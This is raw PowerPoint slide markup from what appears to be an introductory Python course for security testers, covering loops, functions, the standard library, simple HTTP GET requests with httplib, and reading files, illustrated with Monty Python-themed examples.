              </a:rPr>
              <a:t>    else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        blackknight.wins += 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For loops iterate over a list of items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>for swallow in [european, african, american, asian]:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    print(swallow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>for i in range(3):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    answer = rawinput( bridgekeeper.question[i] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    if answer != bridgekeeper.question[i].answer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        print("Auuuuuuuugh!"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> for added control in loop structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="552685026"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="320040" y="1676400"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python functions must be declared before use using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> keyword</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To return data from a function, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>statement within the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To call a function use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>functionname(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>) with required inputs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>air_speed_velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mass, frequency, amplitude):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    '''algorithm from http://style.org/unladenswallow/'''</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>answer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= 3 * frequency * amplitude</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>''' Call function to calculate air speed velocity for European swallow'''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>air_speed_velocity(20.3 , 15, 22)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43567917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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python Standard Library</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1691640"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>One of the powers of Python is the standard library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>This library contains the ability for many of the common actions we need for our tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Simple HTTP libraries are part of the standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Some examples abilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Regular Expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>gzip compression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sha1 hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTML parsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2083811975"/>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a:xfrm>
            <a:off x="219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Making HTTP Requests</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>within Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29698" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Built-in HTTP handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>httplib, urllib and urllib2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Simple to create a request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>import httplib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>conn = httplib.HTTPConnection("www.secureideas.com")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>url = "/index.php"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>conn.request("GET", url)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>resp = conn.getresponse()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Above code makes a GET request to www.secureideas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieves the index.php file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Accessing Files in Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1327673"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File objects are created using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>infile=open('usernames.txt', 'r')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Various methods available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>loads the entire file into a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>readline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>reads one line of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>readlines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns the entire file as a list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>writes to the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>removes the file object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Loop through the file using a for loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>for line in infile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>do action per line</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
